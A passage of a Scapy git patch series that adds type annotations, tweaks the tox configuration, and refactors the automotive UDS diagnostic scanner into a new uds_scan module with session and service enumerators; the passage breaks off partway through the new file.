b/scapy/sendrecv.py @@ -1174,15 +1174,16 @@ def _run(self, "The used select function " "will be the one of the first socket") + close_pipe = None # type: Optional[ObjectPipe[None]] if not nonblocking_socket: # select is blocking: Add special control socket from scapy.automaton import ObjectPipe - close_pipe = ObjectPipe() - sniff_sockets[close_pipe] = "control_socket" + close_pipe = ObjectPipe[None]() + sniff_sockets[close_pipe] = "control_socket" # type: ignore def stop_cb(): # type: () -> None - if self.running: + if self.running and close_pipe: close_pipe.send(None) self.continue_sniff = False self.stop_cb = stop_cb @@ -1192,7 +1193,6 @@ def stop_cb(): # type: () -> None self.continue_sniff = False self.stop_cb = stop_cb - close_pipe = None try: if started_callback: @@ -1212,7 +1212,7 @@ def stop_cb(): sockets = select_func(list(sniff_sockets.keys()), remain) dead_sockets = [] for s in sockets: - if s is close_pipe: + if s is close_pipe: # type: ignore break try: p = s.recv() diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 591cc142f8a..fa0229758e2 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -40,13 +40,14 @@ Optional, Tuple, Type, - cast + cast, + _Generic_metaclass ) # Utils -class _SuperSocket_metaclass(type): +class _SuperSocket_metaclass(_Generic_metaclass): desc = None # type: Optional[str] def __repr__(self): diff --git a/scapy/utils.py b/scapy/utils.py index 6ed622bd3d3..3cca5779293 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -2362,7 +2362,7 @@ def get_terminal_width(): return sizex # Backups / Python 2.7 if WINDOWS: - from ctypes import windll, create_string_buffer # type: ignore + from ctypes import windll, create_string_buffer # http://code.activestate.com/recipes/440694-determine-size-of-console-window-on-windows/ h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) diff --git a/test/testsocket.py b/test/testsocket.py index 2d06e4023b1..29fdbc7b4a7 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -21,7 +21,7 @@ open_test_sockets = list() # type: List[TestSocket] -class TestSocket(ObjectPipe, object): +class TestSocket(ObjectPipe[Packet], SuperSocket): nonblocking_socket = False # type: bool def __init__(self, basecls=None): @@ -56,7 +56,7 @@ def send(self, x): # type: (Packet) -> int sx = bytes(x) for r in self.paired_sockets: - super(TestSocket, r).send(sx) + super(TestSocket, r).send(sx) # type: ignore try: x.sent_time = time.time() except AttributeError: @@ -70,33 +70,9 @@ def recv_raw(self, x=MTU): super(TestSocket, self).recv(), \ time.time() - def recv(self, x=MTU): + def recv(self, x=MTU): # type: ignore # type: (int) -> Optional[Packet] - if six.PY3: - return SuperSocket.recv(self, x) - else: - return SuperSocket.recv.im_func(self, x) - - def sr1(self, *args, **kargs): - # type: (Any, Any) -> Optional[Packet] - if six.PY3: - return SuperSocket.sr1(self, *args, **kargs) - else: - return SuperSocket.sr1.im_func(self, *args, **kargs) - - def sr(self, *args, **kargs): - # type: (Any, Any) -> Tuple[SndRcvList, PacketList] - if six.PY3: - return SuperSocket.sr(self, *args, **kargs) - else: - return SuperSocket.sr.im_func(self, *args, **kargs) - - def sniff(self, *args, **kargs): - # type: (Any, Any) -> PacketList - if six.PY3: - return SuperSocket.sniff(self, *args, **kargs) - else: - return SuperSocket.sniff.im_func(self, *args, **kargs) + return SuperSocket.recv(self, x=x) @staticmethod def select(sockets, remain=conf.recv_poll_rate): From 4c8a116489797ac6249c86a9ee14e129377389fc Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 8 Nov 2021 12:32:12 +0100 Subject: [PATCH 0686/1632] Display the output of UTscapy --- tox.ini | 1 + 1 file changed, 1 insertion(+) diff --git a/tox.ini b/tox.ini index 1240cd7a6bb..b745aa89422 100644 --- a/tox.ini +++ b/tox.ini @@ -13,6 +13,7 @@ minversion = 2.9 [testenv] description = "Scapy unit tests" whitelist_externals = sudo +parallel_show_output = true passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT OPENSSL_CONF # Used by scapy SCAPY_USE_LIBPCAP From d2b9bb8cdb084125875ae9a8b995b048e61545c2 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 11 Nov 2021 18:52:28 +0100 Subject: [PATCH 0687/1632] Split #3054: Refactoring of UDS Scanner (#3352) --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/automotive/bmw/hsfz.py | 19 +- scapy/contrib/automotive/doip.py | 16 +- scapy/contrib/automotive/enumerator.py | 327 ------ scapy/contrib/automotive/gm/gmlan_scanner.py | 22 +- .../contrib/automotive/scanner/enumerator.py | 45 +- scapy/contrib/automotive/uds.py | 80 +- scapy/contrib/automotive/uds_ecu_states.py | 3 +- scapy/contrib/automotive/uds_scan.py | 1017 +++++++++++++++++ test/contrib/automotive/ecu.uts | 9 +- test/contrib/automotive/gm/scanner.uts | 101 +- .../automotive/scanner/uds_scanner.uts | 874 ++++++++++++++ test/contrib/automotive/uds.uts | 5 +- test/contrib/automotive/uds_utils.uts | 95 -- test/pcaps/candump_gmlan_scanner.log.gz | Bin 28893 -> 0 bytes test/pcaps/candump_gmlan_scanner.pcap.gz | Bin 0 -> 24939 bytes test/pcaps/candump_uds_scanner.pcap.gz | Bin 0 -> 61894 bytes test/pcaps/gmlan_trace.candump.gz | Bin 8063 -> 0 bytes test/pcaps/gmlan_trace.pcap.gz | Bin 0 -> 8172 bytes 19 files changed, 2058 insertions(+), 556 deletions(-) delete mode 100644 scapy/contrib/automotive/enumerator.py create mode 100644 scapy/contrib/automotive/uds_scan.py create mode 100644 test/contrib/automotive/scanner/uds_scanner.uts delete mode 100644 test/pcaps/candump_gmlan_scanner.log.gz create mode 100644 test/pcaps/candump_gmlan_scanner.pcap.gz create mode 100644 test/pcaps/candump_uds_scanner.pcap.gz delete mode 100755 test/pcaps/gmlan_trace.candump.gz create mode 100644 test/pcaps/gmlan_trace.pcap.gz diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 291e0962f1a..f9837a621c8 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -64,6 +64,7 @@ scapy/contrib/automotive/scanner/staged_test_case.py scapy/contrib/automotive/scanner/test_case.py scapy/contrib/automotive/uds_ecu_states.py scapy/contrib/automotive/uds_logging.py +scapy/contrib/automotive/uds_scan.py scapy/contrib/cansocket_native.py scapy/contrib/cansocket_python_can.py #scapy/contrib/http2.py # needs to be fixed diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index b923de3dbfb..c3e7e4cf4ec 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -12,13 +12,13 @@ import time from scapy.compat import Optional, Tuple, Type - from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField from scapy.layers.inet import TCP from scapy.supersocket import StreamSocket from scapy.contrib.automotive.uds import UDS from scapy.data import MTU +from scapy.error import log_interactive """ @@ -97,8 +97,21 @@ def send(self, x): except AttributeError: pass - return super(UDS_HSFZSocket, self).send( - HSFZ(src=self.src, dst=self.dst) / x) + try: + return super(UDS_HSFZSocket, self).send( + HSFZ(src=self.src, dst=self.dst) / x) + except Exception as e: + # Workaround: + # This catch block is currently necessary to detect errors + # during send. In automotive application it's not uncommon that + # a destination socket goes down. If any function based on + # SndRcvHandler is used, all exceptions are silently handled + # in the send part. This means, a caller of the SndRcvHandler + # can not detect if an error occurred. This workaround closes + # the socket if a send error was detected. + log_interactive.error("Exception: %s", e) + self.close() + return 0 def recv(self, x=MTU): # type: (int) -> Optional[Packet] diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 57b53230b59..3190452f3f3 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -21,6 +21,7 @@ from scapy.contrib.automotive.uds import UDS from scapy.data import MTU from scapy.compat import Union, Tuple, Optional +from scapy.error import log_interactive class DoIP(Packet): @@ -351,7 +352,20 @@ def send(self, x): except AttributeError: pass - return super(UDS_DoIPSocket, self).send(pkt) + try: + return super(UDS_DoIPSocket, self).send(pkt) + except Exception as e: + # Workaround: + # This catch block is currently necessary to detect errors + # during send. In automotive application it's not uncommon that + # a destination socket goes down. If any function based on + # SndRcvHandler is used, all exceptions are silently handled + # in the send part. This means, a caller of the SndRcvHandler + # can not detect if an error occurred. This workaround closes + # the socket if a send error was detected. + log_interactive.error("Exception: %s", e) + self.close() + return 0 def recv(self, x=MTU): # type: (int) -> Optional[Packet] diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py deleted file mode 100644 index c23f02e777d..00000000000 --- a/scapy/contrib/automotive/enumerator.py +++ /dev/null @@ -1,327 +0,0 @@ -# This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Nils Weiss -# This program is published under a GPLv2 license - -# scapy.contrib.description = Enumerator and Automotive Scanner Baseclasses -# scapy.contrib.status = loads - -from collections import defaultdict, namedtuple - -from scapy.error import Scapy_Exception, log_interactive, warning -from scapy.utils import make_lined_table, SingleConversationSocket -import scapy.modules.six as six -from scapy.contrib.automotive.ecu import EcuState -from scapy.contrib.automotive.scanner.graph import Graph - - -class Enumerator(object): - """ Base class for Enumerators - - Args: - sock: socket where enumeration takes place - """ - description = "About my results" - negative_response_blacklist = [] - ScanResult = namedtuple("ScanResult", "state req resp") - - def __init__(self, sock): - self.sock = sock - self.results = list() - self.stats = {"answered": 0, "unanswered": 0, "answertime_max": 0, - "answertime_min": 0, "answertime_avg": 0, - "negative_resps": 0} - self.state_completed = defaultdict(bool) - self.retry_pkt = None - self.request_iterators = dict() - - @property - def completed(self): - return all([self.state_completed[s] for s in self.scanned_states]) - - def pre_scan(self, global_configuration): - pass - - def scan(self, state, requests, timeout=1, **kwargs): - - if state not in self.request_iterators: - self.request_iterators[state] = iter(requests) - - if self.retry_pkt: - it = [self.retry_pkt] - else: - it = self.request_iterators[state] - - log_interactive.debug("Using iterator %s in state %s", it, state) - - for req in it: - try: - res = self.sock.sr1(req, timeout=timeout, verbose=False) - except ValueError as e: - warning("Exception in scan %s", e) - break - - self.results.append(Enumerator.ScanResult(state, req, res)) - if self.evaluate_response(res, **kwargs): - return - - self.update_stats() - self.state_completed[state] = True - - def post_scan(self, global_configuration): - pass - - def evaluate_response(self, response, **kwargs): - return self is None # always return False by default - - def dump(self, completed_only=True): - if completed_only: - selected_states = [k for k, v in self.state_completed.items() if v] - else: - selected_states = self.state_completed.keys() - - data = [{"state": str(s), - "protocol": str(req.__class__.__name__), - "req_time": req.sent_time, - "req_data": str(req), - "resp_time": resp.time if resp is not None else None, - "resp_data": str(resp) if resp is not None else None, - "isotp_params": { - "resp_src": resp.src, "resp_dst": resp.dst, - "resp_exsrc": resp.exsrc, "resp_exdst": resp.exdst} - if resp is not None else None} - for s, req, resp in self.results if s in selected_states] - - return {"format_version": 0.1, - "name": str(self.__class__.__name__), - "states_completed": [(str(k), v) for k, v in - self.state_completed.items()], - "data": data} - - def remove_completed_states(self): - selected_states = [k for k, v in self.state_completed.items() if not v] - uncompleted_results = [r for r in self.results if - r.state in selected_states] - self.results = uncompleted_results - - def update_stats(self): - answered = self.filtered_results - unanswered = [r for r in self.results if r.resp is None] - answertimes = [x.resp.time - x.req.sent_time for x in answered if - x.resp.time is not None and x.req.sent_time is not None] - nrs = [r.resp for r in self.filtered_results if r.resp.service == 0x7f] - try: - self.stats["answered"] = len(answered) - self.stats["unanswered"] = len(unanswered) - self.stats["negative_resps"] = len(nrs) - self.stats["answertime_max"] = max(answertimes) - self.stats["answertime_min"] = min(answertimes) - self.stats["answertime_avg"] = sum(answertimes) / len(answertimes) - except (ValueError, ZeroDivisionError): - for k, v in self.stats.items(): - if v is None: - self.stats[k] = 0 - - @property - def filtered_results(self): - return [r for r in self.results if r.resp is not None] - - @property - def scanned_states(self): - return set([s for s, _, _, in self.results]) - - def show_negative_response_details(self, dump=False): - raise NotImplementedError("This needs a protocol specific " - "implementation") - - def show(self, dump=False, filtered=True, verbose=False): - s = "\n\n" + "=" * (len(self.description) + 10) + "\n" - s += " " * 5 + self.description + "\n" - s += "-" * (len(self.description) + 10) + "\n" - - s += "%d requests were sent, %d answered, %d unanswered" % \ - (len(self.results), self.stats["answered"], - self.stats["unanswered"]) + "\n" - - s += "Times between request and response:\tMIN: %f\tMAX: %f\tAVG: %f" \ - % (self.stats["answertime_min"], self.stats["answertime_max"], - self.stats["answertime_avg"]) + "\n" - - s += "%d negative responses were received" % \ - self.stats["negative_resps"] + "\n" - - if not dump: - print(s) - s = "" - else: - s += "\n" - - s += self.show_negative_response_details(dump) or "" + "\n" - - if len(self.negative_response_blacklist): - s += "The following negative response codes are blacklisted: " - s += "%s" % self.negative_response_blacklist + "\n" - - if not dump: - print(s) - else: - s += "\n" - - data = self.results if not filtered else self.filtered_results - if len(data): - s += make_lined_table(data, self.get_table_entry, dump=dump) or "" - else: - s += "=== No data to display ===\n" - if verbose: - completed = [(x, self.state_completed[x]) - for x in self.scanned_states] - s += make_lined_table(completed, - lambda tup: ("Scan state completed", tup[0], - tup[1]), - dump=dump) or "" - - return s if dump else None - - @staticmethod - def get_table_entry(tup): - raise NotImplementedError() - - @staticmethod - def get_label(response, - positive_case="PR: PositiveResponse", - negative_case="NR: NegativeResponse"): - if response is None: - label = "Timeout" - elif response.service == 0x7f: - # FIXME: service is a protocol specific field - label = negative_case - else: - if isinstance(positive_case, six.string_types): - label = positive_case - elif callable(positive_case): - label = positive_case() - else: - raise Scapy_Exception("Unsupported Type for positive_case. " - "Provide a string or a function.") - return label - - -class Scanner(object): - default_enumerator_clss = [] - - def __init__(self, socket, reset_handler=None, enumerators=None, **kwargs): - # The TesterPresentSender can interfere with a enumerator, since a - # target may only allow one request at a time. - # The SingleConversationSocket prevents interleaving requests. - if not isinstance(socket, SingleConversationSocket): - self.socket = SingleConversationSocket(socket) - else: - self.socket = socket - self.tps = None # TesterPresentSender - self.target_state = EcuState() - self.reset_handler = reset_handler - self.verbose = kwargs.get("verbose", False) - if enumerators: - # enumerators can be a mix of classes or instances - self.enumerators = [e(self.socket) for e in enumerators if not isinstance(e, Enumerator)] + [e for e in enumerators if isinstance(e, Enumerator)] # noqa: E501 - else: - self.enumerators = [e(self.socket) for e in self.default_enumerator_clss] # noqa: E501 - self.enumerator_classes = [e.__class__ for e in self.enumerators] - self.state_graph = Graph() - self.state_graph.add_edge((EcuState(), EcuState())) - self.configuration = \ - {"dynamic_timeout": kwargs.pop("dynamic_timeout", False), - "enumerator_classes": self.enumerator_classes, - "verbose": self.verbose, - "state_graph": self.state_graph, - "delay_state_change": kwargs.pop("delay_state_change", 0.5)} - - for e in self.enumerators: - self.configuration[e.__class__] = kwargs.pop( - e.__class__.__name__ + "_kwargs", dict()) - - for conf_key in self.enumerators: - conf_val = self.configuration[conf_key.__class__] - for kwargs_key, kwargs_val in kwargs.items(): - if kwargs_key not in conf_val.keys(): - conf_val[kwargs_key] = kwargs_val - self.configuration[conf_key.__class__] = conf_val - - log_interactive.debug("The following configuration was created") - log_interactive.debug(self.configuration) - - def dump(self, completed_only=True): - return {"format_version": 0.1, - "enumerators": [e.dump(completed_only) - for e in self.enumerators], - "state_graph": [str(p) for p in self.get_state_paths()], - "dynamic_timeout": self.configuration["dynamic_timeout"], - "verbose": self.configuration["verbose"], - "delay_state_change": self.configuration["delay_state_change"]} - - def get_state_paths(self): - paths = [Graph.dijkstra(self.state_graph, EcuState(), s) - for s in self.state_graph.nodes if s != EcuState()] - return sorted([p for p in paths if p is not None] + [[EcuState()]], - key=lambda x: x[-1]) - - def reset_target(self): - log_interactive.info("[i] Target reset") - self.reset_tps() - if self.reset_handler: - try: - self.reset_handler(self) - except TypeError: - self.reset_handler() - - self.target_state = EcuState() - - def execute_enumerator(self, enumerator): - enumerator_kwargs = self.configuration[enumerator.__class__] - enumerator.pre_scan(self.configuration) - enumerator.scan(state=self.target_state, **enumerator_kwargs) - enumerator.post_scan(self.configuration) - - def reset_tps(self): - if self.tps: - self.tps.stop() - self.tps = None - - def scan(self): - scan_complete = False - while not scan_complete: - scan_complete = True - log_interactive.info("[i] Scan paths %s", self.get_state_paths()) - for p in self.get_state_paths(): - log_interactive.info("[i] Scan path %s", p) - final_state = p[-1] - for e in self.enumerators: - if e.state_completed[final_state]: - log_interactive.debug("[+] State %s for %s completed", - repr(final_state), e) - continue - if not self.enter_state_path(p): - log_interactive.error("[-] Error entering path %s", p) - continue - log_interactive.info("[i] EXECUTE SCAN %s for path %s", - e.__class__.__name__, p) - self.execute_enumerator(e) - scan_complete = False - self.reset_target() - - def enter_state_path(self, path): - if path[0] != EcuState(): - raise Scapy_Exception( - "Initial state of path not equal reset state of the target") - - self.reset_target() - if len(path) == 1: - return True - - for s in path[1:]: - if not self.enter_state(s): - return False - return True - - def enter_state(self, state): - raise NotImplementedError diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index ea853f8dae1..00042fad99b 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -53,6 +53,10 @@ @six.add_metaclass(abc.ABCMeta) class GMLAN_Enumerator(ServiceEnumerator): + """ + Abstract base class for GMLAN service enumerators. This class + implements GMLAN specific functions. + """ @staticmethod def _get_negative_response_code(resp): # type: (Packet) -> int @@ -78,6 +82,11 @@ def _get_initial_requests(self, **kwargs): class GMLAN_ServiceEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): # noqa: E501 + """ + This enumerator scans for all services identifiers of GMLAN. During this + scan, corrupted packets might be sent to an ECU and mainly negative + responses will be received. + """ _description = "Available services and negative response per state" def _get_initial_requests(self, **kwargs): @@ -96,6 +105,10 @@ def _get_table_entry_y(self, tup): class GMLAN_TPEnumerator(GMLAN_Enumerator, StateGeneratingServiceEnumerator): + """ + Performs a check if TesterPresent is available. If a positive response is + received, a new system state is generated and returned. + """ _description = "TesterPresent supported" def _get_initial_requests(self, **kwargs): @@ -232,7 +245,8 @@ class GMLAN_SAEnumerator(GMLAN_Enumerator, StateGenerator): def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] - return (GMLAN() / GMLAN_SA(subfunction=x) for x in range(1, 10, 2)) + scan_range = kwargs.pop("scan_range", range(1, 10, 2)) + return (GMLAN() / GMLAN_SA(subfunction=x) for x in scan_range) def _get_table_entry_y(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str @@ -263,7 +277,10 @@ def _evaluate_retry(self, if response.service == 0x7f and \ self._get_negative_response_code(response) in [0x22, 0x37]: - # requiredTimeDelayNotExpired or requestSequenceError + log_interactive.debug( + "[i] Retry %s because requiredTimeDelayNotExpired or " + "requestSequenceError received", + repr(request)) return super(GMLAN_SAEnumerator, self)._populate_retry( state, request) return False @@ -323,7 +340,6 @@ def evaluate_security_access_response(res, seed, key): @staticmethod def get_key_pkt(seed, keyfunction, level=1): # type: (Packet, Callable[[int], int], int) -> Optional[Packet] - try: s = seed.securitySeed except AttributeError: diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 3adc01513df..9cc362b3f16 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -71,14 +71,29 @@ def _get_negative_response_desc(nrc): def _get_table_entry_x(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str + """ + Provides a table entry for the column which gets print during `show()`. + :param tup: A results tuple + :return: A string which describes the state + """ return str(tup[0]) def _get_table_entry_y(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str + """ + Provides a table entry for the line which gets print during `show()`. + :param tup: A results tuple + :return: A string which describes the request + """ return repr(tup[1]) def _get_table_entry_z(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str + """ + Provides a table entry for the field which gets print during `show()`. + :param tup: A results tuple + :return: A string which describes the response + """ return repr(tup[2]) @staticmethod @@ -342,19 +357,18 @@ def _compute_statistics(self): stats = list() # type: List[Tuple[str, str, str]] for desc, data in data_sets: - answered = [r for r in data if r.resp is not None] + answered = [cast(_AutomotiveTestCaseFilteredScanResult, r) + for r in data if r.resp is not None and + r.resp_ts is not None] unanswered = [r for r in data if r.resp is None] - answertimes = [float(x.resp_ts) - float(x.req_ts) for x in answered if # noqa: E501 - x.resp_ts is not None and x.req_ts is not None] - answertimes_nr = [float(x.resp_ts) - float(x.req_ts) for x in answered if x.resp # noqa: E501 - is not None and x.resp_ts is not None and - x.req_ts is not None and x.resp.service == 0x7f] - answertimes_pr = [float(x.resp_ts) - float(x.req_ts) for x in answered if x.resp # noqa: E501 - is not None and x.resp_ts is not None and - x.req_ts is not None and x.resp.service != 0x7f] - - nrs = [r.resp for r in data if r.resp is not None and - r.resp.service == 0x7f] + answertimes = [float(x.resp_ts) - float(x.req_ts) + for x in answered] + answertimes_nr = [float(x.resp_ts) - float(x.req_ts) + for x in answered if x.resp.service == 0x7f] + answertimes_pr = [float(x.resp_ts) - float(x.req_ts) + for x in answered if x.resp.service != 0x7f] + + nrs = [r.resp for r in answered if r.resp.service == 0x7f] stats.append((desc, "num_answered", str(len(answered)))) stats.append((desc, "num_unanswered", str(len(unanswered)))) stats.append((desc, "num_negative_resps", str(len(nrs)))) @@ -440,12 +454,9 @@ def results_with_response(self): @property def filtered_results(self): # type: () -> List[_AutomotiveTestCaseFilteredScanResult] - filtered_results = list() + filtered_results = self.results_with_positive_response - for r in self.results_with_response: - if r.resp.service != 0x7f: - filtered_results.append(r) - continue + for r in self.results_with_negative_response: nrc = self._get_negative_response_code(r.resp) if nrc not in self.negative_response_blacklist: filtered_results.append(r) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 1adee033b27..479ec72c771 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -9,7 +9,6 @@ import struct import time -from itertools import product from scapy.fields import ByteEnumField, StrField, ConditionalField, \ BitEnumField, BitField, XByteField, FieldListField, \ XShortField, X3BytesField, XIntField, ByteField, \ @@ -17,7 +16,7 @@ FieldLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf -from scapy.error import log_loading +from scapy.error import log_loading, log_interactive, Scapy_Exception from scapy.utils import PeriodicSenderThread from scapy.contrib.isotp import ISOTP from scapy.compat import Dict, Union @@ -182,7 +181,7 @@ class UDS_ERPR(Packet): ] def answers(self, other): - return isinstance(other, UDS_ER) + return isinstance(other, UDS_ER) and other.resetType == self.resetType bind_layers(UDS, UDS_ERPR, service=0x51) @@ -566,6 +565,7 @@ def answers(self, other): # #########################RDBPI################################### class UDS_RDBPI(Packet): + periodicDataIdentifiers = ObservableDict() transmissionModes = { 0: 'ISOSAEReserved', 1: 'sendAtSlowRate', @@ -576,7 +576,7 @@ class UDS_RDBPI(Packet): name = 'ReadDataByPeriodicIdentifier' fields_desc = [ ByteEnumField('transmissionMode', 0, transmissionModes), - ByteField('periodicDataIdentifier', 0), + ByteEnumField('periodicDataIdentifier', 0, periodicDataIdentifiers), StrField('furtherPeriodicDataIdentifier', b"", fmt="B") ] @@ -1212,72 +1212,12 @@ def run(self): # type: () -> None while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: - self._socket.sr1(p, timeout=0.3, verbose=False) + try: + self._socket.sr1(p, timeout=0.3, verbose=False) + except (OSError, ValueError, Scapy_Exception) as e: + log_interactive.critical( + "[!] Exception in TesterPresentSender: %s", e) + break time.sleep(self._interval) if self._stopped.is_set() or self._socket.closed: break - - -def UDS_SessionEnumerator(sock, session_range=range(0x100), reset_wait=1.5): - """ Enumerates session ID's in given range - and returns list of UDS()/UDS_DSC() packets - with valid session types - - Args: - sock: socket where packets are sent - session_range: range for session ID's - reset_wait: wait time in sec after every packet - """ - pkts = (req for tup in - product(UDS() / UDS_DSC(diagnosticSessionType=session_range), - UDS() / UDS_ER(resetType='hardReset')) for req in tup) - results, _ = sock.sr(pkts, timeout=len(session_range) * reset_wait * 2 + 1, - verbose=False, inter=reset_wait) - return [req for req, res in results if req is not None and - req.service != 0x11 and - (res.service == 0x50 or - res.negativeResponseCode not in [0x10, 0x11, 0x12])] - - -def UDS_ServiceEnumerator(sock, session="DefaultSession", - filter_responses=True): - """ Enumerates every service ID - and returns list of tuples. Each tuple contains - the session and the respective positive response - - Args: - sock: socket where packet is sent periodically - session: session in which the services are enumerated - """ - pkts = (UDS(service=x) for x in set(x & ~0x40 for x in range(0x100))) - found_services = sock.sr(pkts, timeout=5, verbose=False) - return [(session, p) for _, p in found_services[0] if - p.service != 0x7f or - (p.negativeResponseCode not in [0x10, 0x11] or not - filter_responses)] - - -def getTableEntry(tup): - """ Helping function for make_lined_table. - Returns the session and response code of tup. - - Args: - tup: tuple with session and UDS response package - - Example: - make_lined_table([('DefaultSession', UDS()/UDS_SAPR(), - 'ExtendedDiagnosticSession', UDS()/UDS_IOCBI())], - getTableEntry) - """ - session, pkt = tup - if pkt.service == 0x7f: - return (session, - "0x%02x: %s" % (pkt.requestServiceId, - pkt.sprintf("%UDS_NR.requestServiceId%")), - pkt.sprintf("%UDS_NR.negativeResponseCode%")) - else: - return (session, - "0x%02x: %s" % (pkt.service & ~0x40, - pkt.get_field('service'). - i2s[pkt.service & ~0x40]), - "PositiveResponse") diff --git a/scapy/contrib/automotive/uds_ecu_states.py b/scapy/contrib/automotive/uds_ecu_states.py index 5315a1b8f1c..c98fed0c026 100644 --- a/scapy/contrib/automotive/uds_ecu_states.py +++ b/scapy/contrib/automotive/uds_ecu_states.py @@ -34,7 +34,8 @@ def UDS_ERPR_modify_ecu_state(self, req, state): @EcuState.extend_pkt_with_modifier(UDS_SAPR) def UDS_SAPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None - if self.securityAccessType % 2 == 0: + if self.securityAccessType % 2 == 0 and \ + self.securityAccessType > 0 and len(req) >= 3: state.security_level = self.securityAccessType # type: ignore diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py new file mode 100644 index 00000000000..a7600cadee9 --- /dev/null +++ b/scapy/contrib/automotive/uds_scan.py @@ -0,0 +1,1017 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = UDS AutomotiveTestCaseExecutor +# scapy.contrib.status = loads + +import struct +import random +import time +import itertools +import copy + +from collections import defaultdict +from typing import Sequence + +from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ + cast, Union, NamedTuple, orb, Set +from scapy.packet import Raw, Packet +import scapy.modules.six as six +from scapy.error import Scapy_Exception, log_interactive +from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ + UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ + UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD + +from scapy.contrib.automotive.ecu import EcuState +from scapy.contrib.automotive.scanner.enumerator import ServiceEnumerator, \ + _AutomotiveTestCaseScanResult, _AutomotiveTestCaseFilteredScanResult, \ + StateGeneratingServiceEnumerator +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC, \ + _SocketUnion, _TransitionTuple, StateGenerator +from scapy.contrib.automotive.scanner.configuration import AutomotiveTestCaseExecutorConfiguration # noqa: E501 +from scapy.contrib.automotive.scanner.graph import _Edge +from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 +from scapy.contrib.automotive.scanner.executor import AutomotiveTestCaseExecutor # noqa: E501 + +# TODO: Refactor this import +from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 + +if six.PY34: + from abc import ABC +else: + from abc import ABCMeta + ABC = ABCMeta('ABC', (), {}) # type: ignore + +# Definition outside the class UDS_RMBASequentialEnumerator +# to allow pickling +_PointOfInterest = NamedTuple("_PointOfInterest", [ + ("memory_address", int), + ("direction", bool), + # True = increasing / upward, False = decreasing / downward # noqa: E501 + ("memorySizeLen", int), + ("memoryAddressLen", int), + ("memorySize", int)]) + + +class UDS_Enumerator(ServiceEnumerator, ABC): + @staticmethod + def _get_negative_response_code(resp): + # type: (Packet) -> int + return resp.negativeResponseCode + + @staticmethod + def _get_negative_response_desc(nrc): + # type: (int) -> str + return UDS_NR(negativeResponseCode=nrc).sprintf( + "%UDS_NR.negativeResponseCode%") + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], "PR: Supported") + + @staticmethod + def _get_negative_response_label(response): + # type: (Packet) -> str + return response.sprintf("NR: %UDS_NR.negativeResponseCode%") + + +class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): + _description = "Available sessions" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + session_range = kwargs.pop("scan_range", range(2, 0x100)) + return UDS() / UDS_DSC(diagnosticSessionType=session_range) + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + + # fix configuration in kwargs to avoid overwrite from user + kwargs["exit_if_service_not_supported"] = False + kwargs["retry_if_busy_returncode"] = False + + # Apply a fixed timeout for this execute. + # Unit-tests may want to overwrite the timeout to speed up testing + if kwargs.pop("overwrite_timeout", True): + kwargs["timeout"] = 3 + + super(UDS_DSCEnumerator, self).execute(socket, state, **kwargs) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%02x: %s" % ( + tup[1].diagnosticSessionType, + tup[1].sprintf("%UDS_DSC.diagnosticSessionType%")) + + @staticmethod + def 